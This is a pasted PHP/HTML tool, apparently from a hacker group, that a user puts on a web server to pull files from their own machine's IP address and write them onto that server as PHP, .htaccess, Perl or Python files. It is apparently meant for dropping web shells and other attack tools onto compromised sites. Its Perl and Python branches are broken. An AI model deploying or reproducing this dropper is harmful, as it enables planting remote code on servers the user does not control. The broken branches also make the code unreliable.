
Get Tools From Your AppServ v2

Feb 4th, 2018
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  1. <form method='POST'>
  2. <body text='#FFFFFF' bgcolor='#000000'>
  3. <style>
  4. table {
  5. border : 0pt;
  6. }
  7. </style>
  8. <title># Get Tools From Your AppServ v2 | By xSecurity | #</title>
  9. <p align='center' dir='ltr'><font face='Ubuntu'><b><font size='6'>GeT Tools From
  10. Your AppServ</font><font color='#FF0000' size='2'>v2</font></b></font></p>
  11. <table align='center' border='1' width='25%'>
  12. <tr>
  13. <td width='50%'>
  14. <p align='center' dir='ltr'><font face='Ubuntu' size='2'>Folder Name in Your AppServ</font></td>
  15. <td>
  16. <p align='center' dir='ltr'><font face='Ubuntu' size='2'>Folder Name Will Be Created</font></td>
  17. </tr>
  18. <tr>
  19. <td width='50%'>
  20. <p align='center' dir='ltr'><font size='3' face='Ubuntu'>
  21. <input type='text' name='path' value='tools' /></font></td>
  22. <td>
  23. <p align='center' dir='ltr'><font size='3' face='Ubuntu'>
  24. <input type='text' name='dir' value='xsecurity' size='20' /></font></td>
  25. </tr>
  26. </table>
  27. <p align='center' dir='ltr'><font face='Ubuntu'>Type File Then File Name In
  28. AppServ<br>
  29. <select name='xsec'>
  30. <option>php</option>
  31. <option>htaccess</option>
  32. <option>PERL</option>
  33. <option>Python</option>
  34. </select>
  35. <input type='text' name='tool' value='file.txt' /><font size='2'> <br><br></font>
  36. <input type='submit' value='Get Tool' size='10' /></font></p></form><center>
  37. <?
  38. /*
  39. Title : Get Tools From Your AppServ version 2 : )
  40. Coded By : xSecurity
  41. Email :
  42. Skype : b0x-sa
  43. Homepage : -
  44. Greets 2 : Mr.Dm4r - No-QRQR - b0x - Lov3rDNS - DamaneDz - r0kin - DeeF - aBo LalH - aBo Ali & All Members : )
  45. */
  46. # POST
  47. $ip = $_SERVER['REMOTE_ADDR'];
  48. $dir = $_POST['dir'];
  49. $path = $_POST['path'];
  50. $tool = $_POST['tool'];
  51. $mkdir = @mkdir($dir);
  53. # GET PHP
  54. if($_POST['xsec'] == 'php')
  55. {
  56. $php = @file_get_contents("http://$ip/$path/$tool");
  57. $phps = @fopen("$dir/xsec-php.php" ,'w');
  58. $source = $php;
  59. $write1 = @fwrite($phps,$source);
  60. if($write1)
  61. {
  62. echo "[+] Created Complate Name File : [ $dir/xsec-php.php ]";
  63. } else {
  64. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents ] Maybe Doesn't Work";
  65. }
  66. }
  68. if($_POST['xsec'] == 'htaccess')
  69. {
  70. $htaccess = @file_get_contents("http://$ip/$path/$tool");
  71. $htacces = @fopen($dir.'/.htaccess','w');
  72. $sourceh = $htaccess;
  73. $write2 = @fwrite($htacces,$sourceh);
  74. if($write2)
  75. {
  76. echo "[+] Created Complate Name File : [ $dir/.htaccess ]";
  77. } else {
  78. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents ] Maybe Doesn't Work";
  79. }
  80. }
  81. # GET PERL
  82. if($_POST['xsec'] == 'PERL')
  83. {
  84. $perl = @file_get_contents("http://$ip/$path/$tool");
  85. $perls = @fopen($dir.'/','w');
  86. $sourcep = $perl;
  87. $write3 = @fwrite($perls,$sourcep);
  88. chmod("", 0755);
  89. if($write3)
  90. {
  91. echo "[+] Created Complate Name File : [ $dir/ ] <br> Chmod Complate : )";
  92. } else {
  93. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents + CHMOD ] Maybe Doesn't Work";
  94. }
  95. }
  96. # GET Python
  97. if($_POST['xsec'] == 'Python')
  98. {
  99. $python = @file_get_contents("http://$ip/$path/$tool");
  100. $pythons = @fopen($dir.'/','w');
  101. $sourcepy = $python;
  102. $write4 = @fwrite($pythons,$sourcepy);
  103. chmod('', 0755);
  104. if($write4)
  105. {
  106. echo "[+] Created Complate Name File : [ $dir/ ] <br> Chmod Complate : )";
  107. } else {
  108. echo "[~] Error Can't Created Or Can't Get Source From AppServ Check [ @file_get_contents + CHMOD ] Maybe Doesn't Work";
  109. }
  110. }
  111. ?>
  112. <p align='center' dir='ltr'><font size='2' face='Ubuntu'>Coded By :
  113. <font color='#3366CC'>xSecurity</font> - Skype : <font color='#3366CC'>b0x-sa</font><br>
  114. <font color='#3366CC'>&nbsp;</font> - <font color='#3366CC'>
  115. </font><br>
  116. <font color='#3366CC'>4U </font>: Mr.Dm4r - No-QRQR - b0x - Lov3rDNS - DamaneDz
  117. - r0kin - DeeF - aBo LalH - aBo Ali &amp; All Members : )</font></p>
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